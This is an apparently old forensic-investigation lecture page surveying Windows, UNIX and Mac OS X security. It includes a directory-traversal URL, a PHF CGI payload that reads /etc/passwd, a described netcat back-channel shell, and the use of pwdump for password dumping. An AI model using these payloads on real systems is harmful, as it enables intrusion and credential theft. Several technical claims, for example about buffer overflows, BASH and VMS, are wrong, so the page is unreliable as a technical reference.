Systems Software Security

SYSTEMS SOFTWARE SECURITY
"Lo! Men have become the tool of their tools. (Henry David Thoreau)

The operating systems of computer networks are the most vulnerable and frequently attacked targets. Older versions of Windows (e.g, 95/98/9x and ME or Millennium Edition) are less secure operating systems than newer versions of Windows (e.g, NT/2000 and XP), and this is because the consumer versions of Windows 95, 98 and Me were written in code used back before networking was common. In fact, the much of the insecurity legacy that makes up the foundation of most Windows vulnerabilities are based on that old code, MS-DOS 1.0, released back in 1981. Backward compatibility means that companies like Microsoft still produce and support many things than run on old versions of operating systems. For that matter, the initial concept of "windowing" (or WIMP - windows, icons, menus and pointers) was not even a Microsoft product, but first introduced by Apple in 1984 as they developed the MacOS operating system, and later Microsoft created the first version of Windows out of it in 1985. The following version history of major operating systems might be informative:

1981	MS-DOS version 1.0 (first operating system)
1984	Macintosh System 1.0 (breakthrough interface design)
1985	MS-DOS version 2.0 (supported graphics adapters) Windows 1.0 (very similar to MacOS)
1987	MS-DOS version 3.0 (SMARTDrive disk-caching) Windows 2.0 (a less MacOS-looking product)
1989	X Windows (first Unix based system)
1990	MS-DOS 3.1 (extended/expanded memory) Windows 3.0 (true multitasking) OS/2 Warp (first 32 bit operating system)
1991	Linux (free academic/educational OS)
1992	Windows 3.1 (peripheral sharing)
1993	MS-DOS 3.11 (multimedia support)
1993	Windows for Workgroups 3.11 (remote access control)
1994	Red Hat Linux (package-based Linux)
August 1995	Windows 95 (did not require DOS) Windows NT (for servers and businesses)
November 1996	Windows CE (synchronizable mini-OS for palm devices)
June 1998	Windows 98 (support for large hard drives)
February and July 2000	Windows 2000 (Windows NT version 5.0) Windows ME (latest Windows 98 version)
October and December 2001	Windows XP (latest Windows OS) MacOS X (latest Macintosh OS)
January 2007	Windows Vista

In this lecture, we will be dealing primarily with the most recent platforms. From NT to XP to Vista, advanced security upgrades have been the hallmark of progress. Sideline improvements included advanced network support, smoother running operating systems, advanced multitasking, and better user administration. NT, because it lacked the support of certain drivers which enable game playing, became the primary operating system for business and technical users.

Windows 2000, on the other hand, was designed for end-users, but was built on the Windows NT Kernel. It is sometimes referred to as Windows NT 5.0, but it contains millions of lines of code written in C++ and over 8 million of those lines are for drivers. Windows 2000 supports NTFS, requires fewer reboot scenarios, tracks applications to recognize and replace missing components, protects memory, encrypts sensitive file systems, offers Virtual Private Networking (VPN) to support tunneling into private LAN over the public Internet, has a customizable interface, and supports high-speed networking and large bandwidth devices. Windows 2000 Server was a popular product for Microsoft and came packaged with IIS and Microsoft BackOffice.

Windows XP is short for Windows Experienced, and is based on the Windows NT Kernel and driver sets from Windows 2000. It has been a very stable platform for Windows. It has the ability to change its look, automatically update, support multi-users, integrate digital media, and increase reliability. A product activation feature makes it impossible to install it on more than one machine. Microsoft claims it is the most secure operating system to date, thanks to features like driver signing, a built-in firewall, and privacy features in the browser and other applications. Windows XP performs 20 percent faster than other versions of Windows. XP gets faster as you use it because of its dynamic, self-tuning features.

Windows Vista is also known by its original codename Longhorn, and the most distinguishing feature is a completely new graphical interface. Windows Vista automatically comes with the .NET Framework which allows software developers to write API applications. It is a very secure platform, eliminating vulnerabilities to many forms of malware, viruses and buffer overflows. Despite the security improvements, however, Vista has a number of bugs or glitches in it. Probably the first thing users will notice are problems with their drivers uninstalling themselves, like for their sound cards or whenever they attach a peripheral device like a digital camera. Some notable Windows XP features and components have been replaced or removed in Windows Vista, including Windows Messenger, the network Messenger Service, HyperTerminal, MSN Explorer, Active Desktop, and the replacement of NetMeeting with Windows Meeting Space.

Early Windows platforms (95/98/9x/ME) required the end-user to be tricked into downloading malicious code from a website, opening an unsafe e-mail attachment, or socially engineered into changing some user settings. This is because such platforms are true single-user platforms. Such systems are said to have user-level security (as opposed to share-level security as with later versions of Windows). It's impossible to execute remote commands on a Windows 9x system unless the user lets someone in a back door. Rarely are 9x platforms encountered today, but the ME (Millenium Edition) is still common. Windows ME isn't designed to be used in a network environment, so we're talking primarily about home users in this section.

Sometimes, a 9x user may want to establish file and print sharing on the company network (say to print something on the office printer). This is a mistake. File and print sharing should be shut off for Windows 9x users. It compromises passwords, and enables hijacking of direct connections to shared resources like peripheral devices. A similar vulnerability exists if the user is tricked into activating the Remote Registry Service. Once active network management tools are enabled, the attacker will simply install what is called a back-door trojan on the user's machine. A number of backdoor client-server programs exist which make this easy to do. Three of the most common ones include: Back Orifice, NetBus, and SubSeven. Back Orifice was available via the Cult of the Dead Cow website, and allowed near-complete control of Win9x systems. NetBus and SubSeven provided port scanning capability as well as more exotic activities like hijacking the mouse. Back-door trojans are not usually detected by anti-virus programs, and many so-called trojan cleaners installed their own trojans. Firewalls worked, but the Windows vulnerabilities were so bad, nothing seemed to offer much hope. Several new vulnerabilities came out with Microsoft's Personal Web Server and pcAnywhere. For example, pcAnywhere installed by default on ports 5131 and 5132, which became common attack portals. On a 9x/ME system, if unpatched versions of add-on products are run, the front door as well as the back door becames wide open.

Windows ME systems have resource sharing and Remote Registry Service turned OFF by default; a good thing, but ME systems are designed for home users who want to network multiple computers in their house. In essence then, ME systems function as a router, especially if enhanced Internet Connection Sharing is enabled. This makes them vulnerable to what is called an island-hopping attack, a kind of Denial of Service exploit similar to the Ping of Death, but more effective because there are more home computers to work with. In short, Win9x/ME systems leave gaping holes in them unless critical security updates and patches are oft-continually downloaded and installed by the user. Such systems make inviting targets for attackers.

Most of the exploits that occur on a Windows NT/2000/XP system happen in the volatile data areas, such as CPU cache and memory. Therefore, forensic duplication of the hard drive is of lesser importance to the investigator than preserving volatile data. The main weaknesses are log files, password files, and unusual, hidden files. Once an attacker gains access to an NT/2000 system, they need to hide their presence and make themselves "invisible" as much as possible. The way they cover their tracks can fool even the most sophisticated piece of forensic software. In order to understand sophisticated NT attacks, it's important to understand how NT/2000 security works.

Each NT/2000/XP system is shipped with at least seven (7) different built-in user accounts: system; administrator; guest; IUSR__machinename; IWAM__machinename; TSInternetUser; and Krbtgt. All the attacker has to do is find (steal or guess) at the passwords for these accounts. NT/2000 clients are notoriously vulnerable to sniffing and snooping through a number of means: malicious web page code; malicious MIME headers in an e-mail; newsgroup postings; instant messaging; and trojanized multimedia files via a media player. XP clients are vulnerable through poorly configured firewalls; spoofed software updates (especially anti-virus software); raw sockets; and plug and play capabilities. However, the most critical vulnerability exists in the PROFILE setup. Most network environments use profiles in addition to logon scripts, and profiles allows for consistency from desktop to desktop during simultaneous, or concurrent, logons by the same user at different machines. A profile consists of two parts: the actual profile assigned to that account (which contains all private folders); and the All Users folder, which contains common or public folders. The All Users folder (WINNT\PROFILES) always contains the NetHood, or Network Neighborhood. There are different types of profile setups. Local profiles are only valid for one computer at a time, and when the user moves to another computer, they are forced to recreate their profile thru the Microsoft Create User Profile window. Mandatory profiles lock users into a fixed profile where they can only make desktop changes during a current session. Both local and mandatory profiles are, frankly, a bear for users to work with. For this reason, most organizations use something called ROAMING PROFILES (also called hot desking), which follow the user around from machine to machine in the organization. One of the problems with roaming profiles is that if the user forgets to log off from one of the machines they've logged into, that last machine left open will be the one saved with any changes made to access rights and privileges. Another problem is storage of the roaming profiles since they take up a lot of server space, and are sometimes farmed out to departmental servers instead of a central server. A final problem area involves the tendency of users to share their login credentials with someone having login problems, but the NT/2000/XP system begins to recognize the other user, and the two profiles become mixed or combined.

Onto DOMAINS, where networked NT/2000/XP computers share a common security database. When a user logs in to a NT/2000/XP computer, they are actually logging into a domain, which is a third field in the screen that appears when you press Control-Alt-Delete. Logging into a domain involves sending an encrypted version of the username and password to what is called the DOMAIN CONTROLLER, which is usually a central server (the Primary Domain Controller, or PDC) but also involves other machines on the network (the Backup Domain Controllers, or BDC). The BDC is usually a computer physically or logically closest to the user who is logging in. Each domain controller maintains a database called the SAM (Security Accounts Manager) which keeps track of what every user and group are permitted to do with whatever resources exist on that domain. Domain controllers are the most valuable crown jewels of the network, and a sought-after target of attackers. Once a domain controller has been compromised, there is logical access to every other NT/2000/XP machine on the domain, and then it's a matter of seeing the forest thru the trees (explained below).

One of the most dangerous attacks comes thru a client machine via the IUSR__machinename pathway. The attack known as privilege escalation involves taking control of the IUSR__machinename account and modifying it to administrator (or at least power user) status in a domain group, effectively making itself a domain controller. There are at least ten (10) different predefined domain groups on NT/2000/XP networks: administrators; power users, users; guests; authenticated users; backup operators; replicators; server operators; account operators; and print operators. Other domain properties exist, such as special identities (containers) which can be exploited, but the attacker is interested in more than the domain. They are usually interested in the whole enterprise, or forest. NT security boundaries are referred to as domains (usually 10 or 20 computers), trees (usually 10 or 20 domains), and forests (the organization's whole network). Arrangements between these boundaries are called TRUST relationships, which allow accounts in Domain A to be added to accounts in Domain B, for example. On true domain controllers, password accounts are kept in the Active Directory (%windir%\NTDS\ntds.dit), and on newly-created, shall we say, pseudo-domain controllers, in the SAM file stored in the Registry hive (%systemroot%\system32\config). If an attacker succeeds in escalating their privileges to at least power user status on a domain controller, they can inject their own encrypted password hashes into the SAM, delete the SAM, corrupt the SAM, and/or basically lock out other administrators, preventing recovery of the system. We're talking all-powerful, complete network control, which is very enticing to many attackers who want to "own a network."

The oldest and still commonly encountered attack on a XP system is a buffer overflow exploit. Any program running on a computer will accept data from a user or another program, and will try to allocate storage space for that data. Unless the program takes special care to check that the size of the data being passed is less than or equal to the storage space prepared for it, the incoming data will overflow the storage or buffer. With UNIX systems, this is not a problem, because the extra data escapes into the command shell and is not executed unless the data contains valid shell commands at the same privilege level at the administrator. With Windows XP systems, any arbitrary code placed into the extra data is automatically executed, as if it had administrator privileges.

As you can imagine, this inherent flaw creates a wide variety of problems: Denial of Service attacks, Remote Control attacks, Piggybacking, Hijacking, Proxy Bouncing, or Zombie Floods. The flaw lies not within the XP operating system itself, but in the application programs. Any application software installed on any machine is vulnerable to a buffer overflow attack from any node on the network by anyone with zero privileges. Some common exploits include large MIME headers in e-mail, large graphics files from a visited website, or excessive filler in web page form fields. The "payload" depends upon the ingenuity and creativity of the attacker, but the most common result is to produce a remote command prompt with full system privileges on the target system. The classic article on the subject is Aleph One's Smashing the Stack for Fun and Profit which has motivated more than one script-kiddie into becoming a programmer. Another classical piece is Cult of Dead Cow's Tao of Windows Buffer Overflow.

With the notable exception of stolen confidential data, the most common symptom of an intruder messing around with a network (as with malware) is modified, corrupted, or deleted files. XP allows command prompt entry, and source code can often reveal password or other vital information from system files or drivers, and is easily viewed using commands like the ::$DATA command. ISAPI DLLs are particularly vulnerable. From a web page, a technique called File System Traversal will sometimes back you up to the system directories if you are able to guess how many folders deep they are, and this Dot Dot Slash method works like this -- http://www.domain.net/../../../../../../../../winnt/securefile. Another technique called Hex Encoding works well to avoid detection by firewall logs and IDS systems, and involves replacing spaces, slashes, and backslashes with their hexadecimal equivalents, such as %20 (space), %2F (slash), and %5C (backslash).

Browser add-ons (technically called BHOs or Browser Helper Objects) represent another vulnerability category. The website CastleCops has a master list of such add-ons, and separates the good ones from the bad ones. Numerous other vulnerabilities are discussed in many places on the Internet, particularly blogs, such Ed Bott's Blog on Windows.

Besides the above warnings about volatile data and command line vulnerabilities, a basic approach to analyzing an XP system is possible using only command-line tools (quite often in Safe Mode without Networking). At minimum, you may need a floppy with the cmd.exe (command prompt) file on it, and perhaps a few other programs from basic resource kits. Before forensic examination, be sure you've run an MD5checksum on all your forensic files using a program like Hashkeeper. Be aware of bobby traps. If the system goes dead, sometimes you can restore it with EXPLORER.EXE at the command line. If passwords protect the system at every turn, use a program called pwdump to obtain the SAM database so that you have the passwords. After obtaining your usual datetime stamps and running processes, look for the event logs under Administrative tools in the Control Panel. Analyze those logs. Next, consider the Registry as an enormous log file, grab the swap file and any special application files (.hst, .tmp, .pst, .log) like the cache, recycle bin, and printer spool. It's best to use forensic software to extract these files because it places them in read-only format, which makes for an offline, controlled environment and protects you from any allegation that you modified or tampered with the evidence. String searches are then done using Windows Explorer on the suspect hard drive, looking for certain keywords particular to the purpose of your investigation. Pay special attention to encrypted and compressed files.

A final aspect of XP analysis involves digital fingerprinting, and is used whenever the computer has been used to illegally access network shares, domains, trees, or forests. Here, you want to find and examine SIDs (Security Identifiers). The SID is used to identify a user or group uniquely. Each system has its own identifier, and each user has his/her own identifier on that system. The computer identifier and the user identifier are combined to make up the SID. They are not part of the SAM nor found in a Registry hive, but in a Registry Key (HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList) and exist for each and every successful logon event. By comparing SIDs from different machines, you can find out what and how many domains have been accessed. SIDs look like this:

where S designates it as a SID, 1 is the revision level, 5 is the identifier-authority value, the long set of numbers from 21 to the one ending with 419 are the subauthority values, and 500 is the relative identifier. Relative identifiers are the domain codes. Tokens are a list of all SIDS, and SIDS are passed through the Challenge/Response Authentication scheme, which means even people accessing domains from remotely will have them. This makes it easy to prove that an attacker's computer was the one which carried out the attack; that is, unless you've got a sophisticated attacker who uses somebody else's machine as a "zombie" or proxy for the attack.

UNIX is an operating system that predates the Internet, and is used more frequently than people know. It's associated with the birth of the Internet because Internet Service Providers (ISPs) came into being with UNIX servers, and at one time almost all academic institutions used DEC VAX clusters running VMS, a sub-variant of UNIX. In addition, the military and IBM servers rely heavily upon UNIX (POSIX-compliant and AIX versions).

It was developed in 1969 by Bell Labs, a division of AT&T Research, (Bell Labs now being part of Lucent Technologies), and in 1973 was rewritten in C, making it one of the first truly portable operating systems. In the 1970s, the Department of Justice refused to let AT&T sell software, so AT&T established marketing licenses with numerous vendors, the most notable of these being the Department of Computer Science at UC-Berkeley, which resulted in release of the 1977 Berkeley Software Distribution (BSD) version of UNIX, which has always been free. Meanwhile, at AT&T, it continued to evolve into UNIX System V, released in 1983 by Unix System Laboratories (USL), which is owned by Novell. In 1984, Sun Microsystems got into the act, modifying the System V version into highly successful Solaris "flavors" of UNIX, and marketing its own variant of BSD known as SunOS. In 1992, Digital Equipment (sold to Compaq Corporation in 1998) got in the act with a version of UNIX known as Ultrix (or DEC UNIX), also derived from System V. Hewlett Packard also entered the fray with HP-UNIX. The 1990s also saw Silicon Graphics produce a version called IRIX (or SGI UNIX), and of course, the 90's gave us Linux. There are currently over 80 different "flavors" of UNIX (Visit the Unix Guru Universe for a list). System V and BSD are the most popular, in the corporate world and non-corporate world, respectively.

As UNIX continues to constantly evolve, all versions, variants, sub-variants, and flavors tend to be moving toward POSIX as their ultimate goal. POSIX stands for Portable Operating System Interface for uniX, was created by the U.S. government, and is pronounced pahz-icks, not poh-six. More a set of standards for merging the Open Source and Microsoft worlds of interface design closer together, POSIX represents a series of specifications that are designed to combine robust interoperability with the sometimes necessary requirement of developing parts of an application in a very platform specific manner. The POSIX.1 specifications have been around since 1988, and source code that tests to such specifications is known as FIPS 151-2 or XPGR certified, or in short, POSIX-compliant. Certification of such systems (by NIST or organizations like The Open Group) are an important part of bidding wars when multi-million dollar purchases are made by companies for overhauled computer systems.

The KERNEL controls the hardware and turns parts of the system on and off upon command. If you ask the computer to list (ls) all the files in a directory, the kernel tells the computer to read all the files in that directory from the disk and display them on your screen. The SHELL acts as an interpreter between the user and the computer. There are several different types of shells, most notably the Bourne shell (the original shell), the C shell (which allows command-line scripts), the TC shell (which provides an emacs style of editing), the Korn shell (which comes standard on most UNIX installations), and the BASH shell (Bourne Again SHell, which is graphical, and found mostly in the academic community). The Korn shell is the most efficient one and most commonly encountered. You can find out what shell is running on a UNIX system by typing echo $SHELL. A user can have more than one shell installed, and switch from one to another. A shell can also accept "piped" input from a device other than a keyboard. Scripting allows commands to be strung together, so that the output of one program can become the input for another program. If you encounter a machine in graphical mode, you can sometimes switch to console, or command-line mode by pressing ALT-F2.

The basic form of a UNIX COMMAND is command_name -options argument(s). An option is always preceded by a hyphen, and usually consists of a single letter, but some commands accept multiple options by grouping them together after a single hyphen. An argument can be a filename or specific file contents. You can always type the word man (short for manual) at the command prompt to see a list of all built-in UNIX commands. You can add to the built-in commands by writing your own shell scripts, which is sometimes called Bourne Shell Programming. A list of common UNIX commands can be found here.

There are 7 built-in DIRECTORIES off the root (/) directory. The /bin directory is where the built-in commands reside as binary files. The /dev directory contains special files used to represent devices such as printers and terminals. One of these files represents a null (non-existent) device, which is where UNIX users usually direct unwanted output. The /etc directory consists of files for system administration. The /home directory is each user's personal directory. The /lib directory contains libraries used by various programs. The /tmp directory is a scratch area for storing files on a temporary basis. The /usr directory contains the on-line manual, application programs, and any files or directories shared with other users.

$ grep suck *
cutiepie.txt: so then I told everyone about the suck as I smiled
weekendstory01.doc: as far as things go, it sucked worse that others

In most UNIX systems you can also type the following commands to obtain information about suspicious events:

Command	Displayed Information
who last	who is logged in logins/logout
acctcom	user commands entered
ps	current processes

UNIX provides a number of LOGS, and the one manipulated by investigators the most is the syslog configuration file in the /etc directory. The /etc file is the most important file in the UNIX universe, and is the point of all attacks as well as all detections. If the system is logged into remotely, the syslog will contain the unencrypted password. Another log file involves process accounting -- the pacct or acct file in the /usr directory -- which tracks the commands that each user executes. This logfile is not human-readable, and must be viewed with the lastcomm or acctcomm command.

The most basic security feature in UNIX involves FILE PERMISSIONS. Each time a file is created, the logged in user "owns" that file, and can set access control permissions with the chmod command. For example, if you list all files with the ls command, you might see something like this:

$ ls
drwxrwxr-x 1 tom wp 2018 Aug 30 23:45 adir
-rw-rw-r-- 1 tom wp 8755 Aug 30 23:37 picture.gif
-rwxrwxr-x 1 tom wp 8525 Sep 4 02:48 command.sh

The first character on the far left is either a d (for directory) or a dash (-) indicating a file. The next series of characters involve rwxs (or any combination or absence of same) which are the access permissions. An r indicates read-only permission, and can be given to the file user "owner" (u), group the owner belongs to (g), others the user specifies (o), or all (a). An w indicates write permission, and an x indicates permission to run executable files. In the above example, the user "owner's" name is tom.

Once you have established the file "owner", you need to find out what GROUPS they belong to. UNIX comes with 4 (four) built-in groups: root, admin, users, and mail. Superuser and root are the only members of the root group. Users that can backup, restore, and mount operations are in the admin group. Whomever checks their e-mail with the system is in the mail group. Ordinary mortals are in the users group. Although there are advantages to superuser status (as in power users under Windows), someone with something to hide will usually be in admin groups because of mount capability.

MOUNTING a file system is a way of logging in where all files have read-only or write-only access. It can be done locally or remotely. It has the effect of hiding any files that existed prior to first use of the -mount command. A history of mounting operations is found in the /etc directory. Mount also allows the creation of virtual file systems using loopback mounts. Loopback file systems provide access to existing files using alternate pathnames. Once a virtual file system is created, other file systems can be mounted within it without affecting the original file system.

For investigative purposes, it's important to know that unlinked UNIX files "disappear" once processes that access them terminate. Nothing on the hard drive is actually deleted, but the file's link count is reset to zero. A link count is a tracking of how many processes have used a file. During a normal shutdown, every process is forced to close, and every link count is set to zero, effectively unmounting the system. If the plug is pulled on a UNIX system (non-normal shutdown), the files will have false link counts, something called a dirty bit will be set, and the system will load as mounted next time it's turned on.

There are many ways to attack UNIX systems. An unskilled attacker might try to crack the password with a tool such as John the Ripper. A fast machine can run the entire Webster's dictionary in a couple of hours, to guess at the password. Another might try to achieve interactive shell access via telnet, rlogin, or ssh. Graphical UNIX shells (which run on XWindows) are vulnerable to a program called xterm, which allows remote shell access. An alternative to xterm is reverse telnet, or back channeling. A back channel exploit involves getting the target computer to establish a connection with the attacker's computer. It is accomplished by opening up two windows in the attacker's computer, both listening on ports 25 and 80 via the nc command using the -l and -p switches in verbose mode (-v) without any resolution of IP addresses into hostnames (-n). A third window sends a command to the target machine, telling it to /bin/telnet the hacker's IP address.

An older exploit involves CGI (Common Gateway Interface) vulnerabilities, which are common on UNIX servers. The PHF (Phone Book Script) attack was common in 1996 and 1997 because that was when web pages had form-based interfaces that linked to a white pages-like service for looking up names and contact information. The command /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd would capture the password file once any series of unrecognizable characters would overflow the stack.

More modern attacks involve programs such as knark (which means "drugs" in Swedish), which is a Linux LKM (Loadable Kernel Module) or rootkit. Rootkits will trojanize system processes and hide an attacker's presence. They also usually install sniffers, and come with a variety of other utilities. LKMs go after the kernel, which is simply a file in the root directory. They actually modify the kernel file, effectively changing the operating system. Hackers can then enjoy modifying the command binaries so that they can play around with administrators and users trying to fix their system. Kernel rootkits are devastating, and almost impossible to find. For more information about them, read the SANS backgrounder or PacketStorm Security's list of rootkits. Rootkits represent the state of the art in hacking. To find out if you've been infected with a rootkit, you must install a rootkit and run some of its utilities.

Distributed Denial of Service (DDos) attacks are also common on UNIX and LINUX systems. Variants of the Trinity and Stacheldraht agents exist in the wild, which should be regarded as very serious since college campuses nationwide are infected with them, waiting for the day to launch a zombie attack. Trinity v3 is a DDoS tool that is controlled via IRC or ICQ. When a system has been compromised and the Trinity v3 tool installed, each compromised machine joins a specified IRC channel and waits for commands. The Trinity v3 tool enables intruders to use multiple, Internet-connected systems to launch packet flooding denial of service attacks against one or more target systems. At least eight variations of Trinity have been found. Stacheldraht consists of three parts -- a master server, a client, and an agent program -- and runs on Linux and Solaris machines. Stacheldraht performs several types of flooding attacks, and has IRC flooding options. If such agents are installed, they are most likely set by a timer to go off at a later date, hence the need for investigators to know how to analyze UNIX crontab files, which list scheduled events.

Sooner or later, an investigator is going to have to attempt recovering deleted files from a UNIX or Linux system. This is very hard to do. UNIX stores file information in physical disk locations called inodes. An anode contains last accessed/created/modified information as well as the file size, reference count, and data block. To recover a UNIX file, one must rebuilt the file size and data block list. This is not easily done, and requires a tool called icat from the Coroner's Toolkit. Using icat and specifying the device and inode of a file (detected from a ls command), you can often reconstruct the entire contents of the file. However, it's mostly a matter of luck.

Apple Computer, Inc. has a long history. The company was started in 1976 by Steven Jobs and Steven Wozniak, and was the first personal computer housed in plastic and to have color graphics. Other firsts include the 1991 rollout of Powerbook, the world's first notebook, and the 1993 production of Newton, the world's first PDA. Today's Macs range from the $1400 iMac (both new and old) to a fully-equipped $3900 Power Mac G4 (the Cube), and all Apple computers come shipped with both Mac OS X and Mac OS 9 installed on them. A few 1997 or older Macs can still be found running versions of OS 8, and OS 7 which were fairly insecure systems (no password authentication, for example), but the vast majority of apps were written for OS 9. Apple markets a variety of accessories as well as computer hardware and software. For years, the Mac OS and Windows OS were incompatible, and they still are somewhat, but see the Complete Guide to Mac/Windows Interoperability.

Mac OS X (the focus of this lecture) is a customized variant of mach3 Unix (SunOS Unix) and BSD Linux (FreeBSD Unix), and represents a radical departure from previous Mac Operating Systems for Apple. DARWIN is the name for the Apple-friendly UNIX-based core of Mac OS X. CARBON and COCOA are built-in application programming interface (API) environments which allow developers to create their own customized applications. Carbon is a C-level scripting language for application programming or threading, and Cocoa contains user-interface widgets in what Apple calls Aqua programming, designed for rapid development of object-oriented plug-ins. Aqua is also the name for the shell in which users interact with the Operating System. Each copy of Mac OS X includes JAVA (J2SE) which affords the ability to create and run Java (and XML) applications. Every version of Mac OS X ships in multiple languages on a single CD, and the machines are speech-enabled (Text to Speech, and Speech to Text if you add a microphone). The G4s have fairly fast clock speeds (Macs are optimized for speed), and all Macs come equipped with firewire outlets for high-speed peripherals. Like Windows, driver files are required for most devices. QUICKTIME is the multimedia player and QUARTZ is the multimedia creator for Mac OS X, but most users will probably purchase the full version of QuickTime or Final Cut Pro to produce multimedia. In addition, Apple has supported wireless networking since the 1999 iBook and AirPort (using Bluetooth technology). Netscape and Eudora are the web browser and e-mail client of choice, and Dreamweaver and GoLive are the only web editors for a Mac (FrontPage has discontinued support).

The Darwin kernel provides basic services such as threading, scheduling, synchronization, address space management, timers, and virtual memory. In addition, a variety of kernel extensions (KEXTs) are available to extend capabilities. With OS X, users can restrict access to areas of the operating system as well as particular functionalities of an application. Kerberos is used as the default network authentication protocol. Networking with Windows computers has always been a problem, but Apple has tried to make some improvements with OS X. First of all, long file names are supported along with file extensions, but Macs turn off showing those extensions by default. AppleTalk, which has long been Apple's version of connectivity utilities, works well with other Macs connected by Apple servers (and with Windows machines on some older NT networks as well as UNIX machines on a SAMBA network), but the user most likely need to install a full suite of TCP/IP utilities to connect on modern Windows networks. By default Mac OS X sets up an Automatic location that uses DHCP for Ethernet and AirPort connections, and PPP for modems. Familiar Mac desktop features include the Finder, which allows resource sharing across a network, and the Dock, which stores icons and shortcuts.

The programs used by Macintosh users (Netscape, Eudora, etc.) are subject to as many exploits, if not more of them, than the typical programs for Windows. Nor are Macintoshes free from viruses, as is often claimed (visit Viruses and the Macintosh). For live analysis of Macs, the forensic investigator can view a text version of the startup process by holding down CMD-V, which will have the same value as analyzing the CMOS and BIOS. Subscription to any of the Mac Magazine and Security sites listed below will provide further information. What follows is a discussion of some interesting vulnerabilities raised by the Apple Macintosh platform.

Certificate-based authentication became the rage in 1998 as an alternative to password-based authentication. Digital certificates are like a driver's license to browse the web. They permit you to access web sites containing or asking for sensitive information, like financial records (online banking), medical records, and conduct any transaction dealing with money, social security numbers, or proprietary information. They play a big role in cybercrime and corporate espionage. An understanding of digital certificates (also known as X.509-based PKI - Public Key Infrastructure) requires an understanding of SSL (Secure Sockets Layer).

Mac OS X relies upon SSL, which most people commonly encounter when they access a web page where the URL begins with https:// rather than http:// or a yellow padlock appears in the system tray. SSL was developed by Netscape back in 1994. SSL sets up a secure connection, often called a TUNNEL, between browsers and web servers. It uses public key (RSA) encryption and digital certificates. During connectivity, SSL inserts itself between TCP/IP and the higher-level protocols on behalf of applications, this layer eliminating the need for encryption/decryption features in every Web-enabled application. Before SSL can be used, web servers must be issued a digital certificate from VeriSign Corp or another certification authority (CA), but anyone with the right software (such as keytool) can create a digital certificate. When a browser encounters one of these homemade CAs, a popup window appears, asking the user if he/she wants to "trust" this site. Name-brand "trusted" sites are built into the latest browser versions to facilitate easy of online shopping from corporate giants, but few users know when they are adding new "trust" relationships with different sites, or how to edit their list of certificates.

Bogus and forged digital certificates are known threats. In 2001, VeriSign itself apologized for issuing two of them to someone pretending to be a Microsoft employee. Self-made bogus keys work by forging the "root" of a trusted site, then getting illegitimate certificates to be treated as legitimate ones. The storage of private keys on personal computers is another threat. Many viruses and trojans exist to extract these keys from your computer, and RSA encryption of the keys is often too weak. It depends upon how fast the owner of a secure web site wants to make things. Low-level 40-bit and 56-bit encryption means faster online shopping, and more secure 128-bit keys will slow down the time it takes for a page to load. Also, it depends upon how much information is being transacted. If exchange of large databases are involved (as they always are in the corporate, government, financial, education, and healthcare sectors), then the incentive is to use weak, low-level encryption for the PKI.

Some systems rely on tamper-resistant hardware for security: smart cards, electronic wallets, or dongles, and these devices are subject to attack. Smart card are used in SSO (Single Sign On) authentication where the employee comes to work, inserts their smart card, and that's it - no more logins or passwords for the rest of the day. The so-called "timing attack" involves measuring the relative time these cryptographic operations take. The attack has been successfully implemented against smart cards, security tokens, and electronic commerce servers across the Internet. Varieties include measuring power consumption, TEMPEST radiation emissions, and other "side channels." Another technique is fault analysis: deliberately introducing faults into cryptographic processors in order to determine the secret keys. The really scary part is that these techniques also work on ATM (cash machine) cards, credit cards, and most cash register transactions.

With AirPort, Mac has pushed the wireless (2.4GHz band) envelope further than other manufacturers. It's not difficult to configure a wireless network, and they are the stuff of Internet coffee shops and cybercafes everywhere. In major cities like Seattle and New York, you can drive around certain neighborhoods until your mobile computer detects a Wireless Access Point (WAP), and then connect to the Internet at surprisingly fast speeds (11Mbps per second). Similar technology is used for PDAs (Personal Digital Assistants) and Web-enabled cell phones. Wireless networks use weak 64-bit (802.11b or RC4) encryption for authentication, which consists mainly of pseudo-random stream ciphers and data packet integrity checks. Designed for short keys, stream ciphers consist of flip-flopping data streams that are half-code and half-English. All an eavesdropper needs to do is monitor wireless traffic (over a promiscuous wireless network card using AirSnort) for about 15 minutes to figure out a wireless network's password authentication (if any).

Besides the ease of breaking into wireless networks, it's easy to set up a decoy wireless operation to sniff user information and passwords from the air. This occurs when a illegitimate access point is set up nearby (within 300 feet without signal enhancers) a legitimate wireless access point for the purpose of tricking unsuspecting users into thinking they've logged onto the legitimate one. Often, the customers of a wireless network provider are the target. That's why users are encouraged to use their own encryption. Such measures include Virtual Private Network (VPN), Secure Socket Layer (SSL), Secure Shells (SSH), Secure Copy (SCP). Macintosh shareware and freeware exist for SSH and SCP.

Lots of devices use the 2.4GHz band other than wireless computers. These include models of cordless phones, baby monitors, garage door openers, fish finders, emergency radios, and Global Positioning Systems. These devices can be used for jamming purposes, the wireless equivalent of a Denial of Service attack. Apple supports all Bluetooth devices, such as headsets, earbuds, and pagers, which operate on the same 2.4GHz frequency, and are subject to the same jamming and snooping that all wireless networking is subject to. Although Bluetooth products often have customizable security level settings, use of the highest levels would interfere with their ease of use.

Last updated: Dec. 21, 2008
Not an official webpage of APSU, copyright restrictions apply, see Megalinks in Criminal Justice
O'Connor, T. (Date of Last Update at bottom of page). In Part of web cited (Windows name for file at top of browser), MegaLinks in Criminal Justice. Retrieved from http://www.apsu.edu/oconnort/rest of URL accessed on today's date.